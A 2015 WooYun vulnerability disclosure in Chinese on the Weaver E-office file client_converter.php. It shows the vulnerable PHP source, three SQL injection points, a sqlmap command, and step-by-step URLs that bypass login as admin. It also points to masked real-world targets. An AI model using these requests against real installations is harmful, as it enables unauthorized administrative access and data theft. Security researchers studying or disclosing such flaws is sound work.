泛微Eoffice某处文件存在多处SQL注入及可绕过登录直接操作后台

发表于 2015年07月06日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0124503

漏洞标题：泛微Eoffice某处文件存在多处SQL注入及可绕过登录直接操作后台

漏洞详情

披露状态：

2015-07-06: 细节已通知厂商并且等待厂商处理中
2015-07-08: 厂商已经确认，细节仅向厂商公开
2015-07-11: 细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2015-09-01: 细节向核心白帽子及相关领域专家公开
2015-09-11: 细节向普通白帽子公开
2015-09-21: 细节向实习白帽子公开
2015-10-06: 细节向公众公开

简要描述：

表示还没收到过有$的洞，来一个试试

详细说明：

漏洞文件：/client_converter.php代码如下：

<?php<br>
/*********************/<br>
/*                   */<br>
/*  Version : 5.1.0  */<br>
/*  Author  : RM     */<br>
/*  Comment : 071223 */<br>
/*                   */<br>
/*********************/session_start( );<br>
include_once( "inc/conn.php" );<br>
$userAccount = $_REQUEST['userAccount'];<br>
$langID = $_REQUEST['lang'];<br>
$getLangFlagSQL = "SELECT * FROM language WHERE LANG_ID = ".$langID;<br>
$getLangFlagResult = exequery( $connection, $getLangFlagSQL );<br>
$getLangFlagRow = mysql_fetch_array( $getLangFlagResult );<br>
$lang = $getLangFlagRow['LANG_AB'];<br>
$query = "SELECT * from USER where USER_ACCOUNTS='".$userAccount."'";<br>
$cursor = exequery( $connection, $query );<br>
$ROW = mysql_fetch_array( $cursor );<br>
$query = "SELECT * from USER_PRIV where USER_PRIV=".$ROW['USER_PRIV'];<br>
$cursor = exequery( $connection, $query );<br>
if ( $ROW1 = mysql_fetch_array( $cursor ) )<br>
{<br>
				$LOGIN_FUNC_STR = $ROW1['FUNC_ID_STR'];<br>
}<br>
$LOGIN_THEME = $ROW['THEME'];<br>
$template = $ROW['TEMPLATE'];<br>
if ( !$template )<br>
{<br>
				$template_query = "SELECT TEMPLATE_NAME FROM sys_template WHERE TEMPLATE_DEFAULT = 1 ";<br>
				$template_rs = exequery( $connection, $template_query );<br>
				if ( $row_tp = mysql_fetch_array( $template_rs ) )<br>
				{<br>
								$template = $row_tp['TEMPLATE_NAME'];<br>
				}<br>
				else<br>
				{<br>
								$template = "8series";<br>
				}<br>
}<br>
if ( $template == "8series" )<br>
{<br>
				$mainUrl = "/general/index8.php";<br>
}<br>
else if ( $template == "7series" )<br>
{<br>
				$mainUrl = "/general/index.php";<br>
}<br>
else<br>
{<br>
				$mainUrl = "index8.php";<br>
}<br>
if ( $LOGIN_THEME == "" )<br>
{<br>
				$LOGIN_THEME = "default";<br>
}<br>
$LOGIN_THEME = $template."/".$LOGIN_THEME;<br>
$_SESSION['LOGIN_USER_ID'] = $ROW['USER_ID'];<br>
$_SESSION['LOGIN_PASSWORD'] = $ROW['PASSWORD'];<br>
$_SESSION['LOGIN_POST_PRIV'] = $ROW['POST_PRIV'];<br>
$_SESSION['LOGIN_USER_ACCOUNTS'] = $ROW['USER_ACCOUNTS'];<br>
$_SESSION['LOGIN_USER_NAME'] = $ROW['USER_NAME'];<br>
$_SESSION['LOGIN_USER_PRIV'] = $ROW['USER_PRIV'];<br>
$_SESSION['LOGIN_DEPT_ID'] = $ROW['DEPT_ID'];<br>
$_SESSION['LOGIN_FUNC_STR'] = $LOGIN_FUNC_STR;<br>
$_SESSION['LOGIN_THEME'] = $LOGIN_THEME;<br>
$_SESSION['LOGIN_LANG_ID'] = $langID;<br>
$_SESSION['LOGIN_LANG'] = $lang;<br>
$targetType = $_REQUEST['target'];<br>
$url = $_REQUEST['goto'];<br>
$funcID = $_REQUEST['funcID'];<br>
if ( $funcID != "" )<br>
{<br>
				$query = "update user_menu set FREQUENCY =FREQUENCY+1 where user_id='".$ROW['USER_ID']."' and func_id={$funcID}; ";<br>
				exequery( $connection, $query );<br>
}<br>
if ( $targetType == "blank" )<br>
{<br>
				header( "location:".$url );<br>
}<br>
else<br>
{<br>
				header( "location:".$mainUrl."?goto=".urlencode( $url ) );<br>
}<br>
?>

<?php

/*********************/

/* */

/* Version : 5.1.0 */

/* Author : RM */

/* Comment : 071223 */

/* */

/*********************/session_start( );

include_once( "inc/conn.php" );

$userAccount = $_REQUEST['userAccount'];

$langID = $_REQUEST['lang'];

$getLangFlagSQL = "SELECT * FROM language WHERE LANG_ID = ".$langID;

$getLangFlagResult = exequery( $connection, $getLangFlagSQL );

$getLangFlagRow = mysql_fetch_array( $getLangFlagResult );

$lang = $getLangFlagRow['LANG_AB'];

$query = "SELECT * from USER where USER_ACCOUNTS='".$userAccount."'";

$cursor = exequery( $connection, $query );

$ROW = mysql_fetch_array( $cursor );

$query = "SELECT * from USER_PRIV where USER_PRIV=".$ROW['USER_PRIV'];

$cursor = exequery( $connection, $query );

if ( $ROW1 = mysql_fetch_array( $cursor ) )

{

$LOGIN_FUNC_STR = $ROW1['FUNC_ID_STR'];

}

$LOGIN_THEME = $ROW['THEME'];

$template = $ROW['TEMPLATE'];

if ( !$template )

{

$template_query = "SELECT TEMPLATE_NAME FROM sys_template WHERE TEMPLATE_DEFAULT = 1 ";

$template_rs = exequery( $connection, $template_query );

if ( $row_tp = mysql_fetch_array( $template_rs ) )

{

$template = $row_tp['TEMPLATE_NAME'];

}

else

{

$template = "8series";

}

if ( $template == "8series" )

{

$mainUrl = "/general/index8.php";

}

else if ( $template == "7series" )

{

$mainUrl = "/general/index.php";

}

else

{

$mainUrl = "index8.php";

}

if ( $LOGIN_THEME == "" )

{

$LOGIN_THEME = "default";

}

$LOGIN_THEME = $template."/".$LOGIN_THEME;

$_SESSION['LOGIN_USER_ID'] = $ROW['USER_ID'];

$_SESSION['LOGIN_PASSWORD'] = $ROW['PASSWORD'];

$_SESSION['LOGIN_POST_PRIV'] = $ROW['POST_PRIV'];

$_SESSION['LOGIN_USER_ACCOUNTS'] = $ROW['USER_ACCOUNTS'];

$_SESSION['LOGIN_USER_NAME'] = $ROW['USER_NAME'];

$_SESSION['LOGIN_USER_PRIV'] = $ROW['USER_PRIV'];

$_SESSION['LOGIN_DEPT_ID'] = $ROW['DEPT_ID'];

$_SESSION['LOGIN_FUNC_STR'] = $LOGIN_FUNC_STR;

$_SESSION['LOGIN_THEME'] = $LOGIN_THEME;

$_SESSION['LOGIN_LANG_ID'] = $langID;

$_SESSION['LOGIN_LANG'] = $lang;

$targetType = $_REQUEST['target'];

$url = $_REQUEST['goto'];

$funcID = $_REQUEST['funcID'];

if ( $funcID != "" )

{

$query = "update user_menu set FREQUENCY =FREQUENCY+1 where user_id='".$ROW['USER_ID']."' and func_id={$funcID}; ";

exequery( $connection, $query );

}

if ( $targetType == "blank" )

{

header( "location:".$url );

}

else

{

header( "location:".$mainUrl."?goto=".urlencode( $url ) );

}

注入漏洞：注入存在以下语句

$userAccount = $_REQUEST['userAccount'];<br>
$langID = $_REQUEST['lang'];<br>
$getLangFlagSQL = "SELECT * FROM language WHERE LANG_ID = ".$langID; //lang直接进入sql

$userAccount = $_REQUEST['userAccount'];

$langID = $_REQUEST['lang'];

$getLangFlagSQL = "SELECT * FROM language WHERE LANG_ID = ".$langID; //lang直接进入sql

查询

$getLangFlagResult = exequery( $connection, $getLangFlagSQL );<br>
$getLangFlagRow = mysql_fetch_array( $getLangFlagResult );<br>
$lang = $getLangFlagRow['LANG_AB'];<br>
$query = "SELECT * from USER where USER_ACCOUNTS='".$userAccount."'"; //userAccount直接进入sql查询<br>
$cursor = exequery( $connection, $query );<br>
$ROW = mysql_fetch_array( $cursor );<br>
……..省略代码……<br>
$funcID = $_REQUEST['funcID'];<br>
if ( $funcID != "" )<br>
{<br>
				$query = "update user_menu set FREQUENCY =FREQUENCY+1 where user_id='".$ROW['USER_ID']."' and func_id={$funcID}; "; //funcID直接进入sql查询<br>
				exequery( $connection, $query );<br>
}

$getLangFlagResult = exequery( $connection, $getLangFlagSQL );

$getLangFlagRow = mysql_fetch_array( $getLangFlagResult );

$lang = $getLangFlagRow['LANG_AB'];

$query = "SELECT * from USER where USER_ACCOUNTS='".$userAccount."'"; //userAccount直接进入sql查询

$cursor = exequery( $connection, $query );

$ROW = mysql_fetch_array( $cursor );

……..省略代码……

$funcID = $_REQUEST['funcID'];

if ( $funcID != "" )

{

$query = "update user_menu set FREQUENCY =FREQUENCY+1 where user_id='".$ROW['USER_ID']."' and func_id={$funcID}; "; //funcID直接进入sql查询

exequery( $connection, $query );

}

上面三处参数都是直接进入sql语句进行查询，导致注入

sqlmap.py -u "http://localhost/client_converter.php?userAccount=1&lang=1" --dbms=mysql --dbs

1	sqlmap.py -u "http://localhost/client_converter.php?userAccount=1&lang=1" --dbms=mysql --dbs

网上案例测试如下

绕过登录直接操作后台问题存在如下代码：

$query = "SELECT * from USER where USER_ACCOUNTS='".$userAccount."'";<br>
$cursor = exequery( $connection, $query );<br>
$ROW = mysql_fetch_array( $cursor );<br>
$query = "SELECT * from USER_PRIV where USER_PRIV=".$ROW['USER_PRIV'];<br>
$cursor = exequery( $connection, $query );<br>
if ( $ROW1 = mysql_fetch_array( $cursor ) )<br>
{<br>
				$LOGIN_FUNC_STR = $ROW1['FUNC_ID_STR'];<br>
}<br>
……省略代码……<br>
//userAccount参数进入SQL语句，查询UserAccount表，如记录存在 把USER_ID PASSWORD等值赋值到SESSION里面。<br>
$LOGIN_THEME = $template."/".$LOGIN_THEME;<br>
$_SESSION['LOGIN_USER_ID'] = $ROW['USER_ID'];<br>
$_SESSION['LOGIN_PASSWORD'] = $ROW['PASSWORD'];<br>
$_SESSION['LOGIN_POST_PRIV'] = $ROW['POST_PRIV'];<br>
$_SESSION['LOGIN_USER_ACCOUNTS'] = $ROW['USER_ACCOUNTS'];<br>
$_SESSION['LOGIN_USER_NAME'] = $ROW['USER_NAME'];<br>
$_SESSION['LOGIN_USER_PRIV'] = $ROW['USER_PRIV'];<br>
$_SESSION['LOGIN_DEPT_ID'] = $ROW['DEPT_ID'];<br>
$_SESSION['LOGIN_FUNC_STR'] = $LOGIN_FUNC_STR;<br>
$_SESSION['LOGIN_THEME'] = $LOGIN_THEME;<br>
$_SESSION['LOGIN_LANG_ID'] = $langID;<br>
$_SESSION['LOGIN_LANG'] = $lang;再看后台验证功能的文件，/inc/auth.php。部分代码如下<br>
session_start( );<br>
include_once( "inc/utility.php" );<br>
include_once( "inc/conn.php" );<br>
global $_sess;<br>
if ( !session_is_registered( "LOGIN_USER_ID" ) ) //LOGIN_USER_ID<br>
{<br>
				$url = $_SERVER['PHP_SELF'];<br>
				echo "<script>\r\n\ttop.location.href='http://www.secevery.com/login.php';\r\n\t</script>";<br>
				exit( );<br>
}<br>
$_sess['lang'] = $_SESSION['LOGIN_LANG'];<br>
$_sess['lg_theme'] = $_SESSION['LOGIN_THEME'];<br>
$lang_file = "lang/".$_sess['lang']."/common.lang.php";<br>
include_once( $lang_file );<br>
includelangpak( "other" );<br>
if ( $_SESSION['LOGIN_OA_ISPIRIT'] != "ispirit" )<br>
{<br>
				$sql = "SELECT * FROM SYS_PARA WHERE PARA_NAME = 'LIMIT_LOGIN_TIMES' ";<br>
				$re = exequery( $connection, $sql );<br>
				$row = mysql_fetch_array( $re );<br>
				$lock = $row['PARA_VALUE'];<br>
				if ( $lock == "1" )<br>
				{<br>
								$sid = session_id( );<br>
								$uid = $_SESSION['LOGIN_USER_ID'];<br>
								$sql = "SELECT SESSION_ID FROM user_online WHERE USER_ID='".$uid."'";<br>
								$re = exequery( $connection, $sql );<br>
								$row = mysql_fetch_array( $re );<br>
								$row['SESSION_ID'];

$query = "SELECT * from USER where USER_ACCOUNTS='".$userAccount."'";

$cursor = exequery( $connection, $query );

$ROW = mysql_fetch_array( $cursor );

$query = "SELECT * from USER_PRIV where USER_PRIV=".$ROW['USER_PRIV'];

$cursor = exequery( $connection, $query );

if ( $ROW1 = mysql_fetch_array( $cursor ) )

{

$LOGIN_FUNC_STR = $ROW1['FUNC_ID_STR'];

}

……省略代码……

//userAccount参数进入SQL语句，查询UserAccount表，如记录存在把USER_ID PASSWORD等值赋值到SESSION里面。

$LOGIN_THEME = $template."/".$LOGIN_THEME;

$_SESSION['LOGIN_USER_ID'] = $ROW['USER_ID'];

$_SESSION['LOGIN_PASSWORD'] = $ROW['PASSWORD'];

$_SESSION['LOGIN_POST_PRIV'] = $ROW['POST_PRIV'];

$_SESSION['LOGIN_USER_ACCOUNTS'] = $ROW['USER_ACCOUNTS'];

$_SESSION['LOGIN_USER_NAME'] = $ROW['USER_NAME'];

$_SESSION['LOGIN_USER_PRIV'] = $ROW['USER_PRIV'];

$_SESSION['LOGIN_DEPT_ID'] = $ROW['DEPT_ID'];

$_SESSION['LOGIN_FUNC_STR'] = $LOGIN_FUNC_STR;

$_SESSION['LOGIN_THEME'] = $LOGIN_THEME;

$_SESSION['LOGIN_LANG_ID'] = $langID;

$_SESSION['LOGIN_LANG'] = $lang;再看后台验证功能的文件，/inc/auth.php。部分代码如下

session_start( );

include_once( "inc/utility.php" );

include_once( "inc/conn.php" );

global $_sess;

if ( !session_is_registered( "LOGIN_USER_ID" ) ) //LOGIN_USER_ID

{

$url = $_SERVER['PHP_SELF'];

echo "<script>\r\n\ttop.location.href='http://www.secevery.com/login.php';\r\n\t</script>";

exit( );

}

$_sess['lang'] = $_SESSION['LOGIN_LANG'];

$_sess['lg_theme'] = $_SESSION['LOGIN_THEME'];

$lang_file = "lang/".$_sess['lang']."/common.lang.php";

include_once( $lang_file );

includelangpak( "other" );

if ( $_SESSION['LOGIN_OA_ISPIRIT'] != "ispirit" )

{

$sql = "SELECT * FROM SYS_PARA WHERE PARA_NAME = 'LIMIT_LOGIN_TIMES' ";

$re = exequery( $connection, $sql );

$row = mysql_fetch_array( $re );

$lock = $row['PARA_VALUE'];

if ( $lock == "1" )

{

$sid = session_id( );

$uid = $_SESSION['LOGIN_USER_ID'];

$sql = "SELECT SESSION_ID FROM user_online WHERE USER_ID='".$uid."'";

$re = exequery( $connection, $sql );

$row = mysql_fetch_array( $re );

$row['SESSION_ID'];

该文件通过判断session里面的值进行用户验证。利用方法：先构造一个用户如admin。访问client_converter.php?userAccount=用户名&lang=cn

出现报错，没关系，接下来直接访问后台主页 general/index8.php。可以访问了。

再访问个用户管理页面general/system/user/userlist.php。

漏洞证明：

网上测试案例：**.**.**.**:8082/client_converter.php?userAccount=admin&lang=cn**.**.**.**:8082/general/system/user/userlist.php

官网http://**.**.**.**:8028/client_converter.php?userAccount=admin&lang=cnhttp://**.**.**.**:8028/general/system/user/userlist.php

修复方案：

严格过滤参数，加强安全意识。

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2015-07-0815:24

厂商回复：

CNVD确认所述情况，已经由CNVD通过以往建立的处置渠道向软件生产厂商通报。

评价

2010-01-01 00:00 xsser 白帽子 | Rank:152 漏洞数:17)

你的很多都有$啊
2010-01-01 00:00 茜茜公主白帽子 | Rank:899 漏洞数:85)

好浮夸表示还没收到过有$的洞，来一个试试
2010-01-01 00:00 Bear baby 白帽子 | Rank:174 漏洞数:14)

@xsser 额，是要再等等才会显示$符号是么。。
2010-01-01 00:00 Bear baby 白帽子 | Rank:174 漏洞数:14)

@茜茜公主我的错。。
2010-01-01 00:00 白无常白帽子 | Rank:85 漏洞数:6)

然而并没有$

原文连接：泛微Eoffice某处文件存在多处SQL注入及可绕过登录直接操作后台 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。

泛微Eoffice某处文件存在多处SQL注入及可绕过登录直接操作后台

漏洞概要

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

漏洞回应

厂商回应：

厂商回复：

最新状态：

评价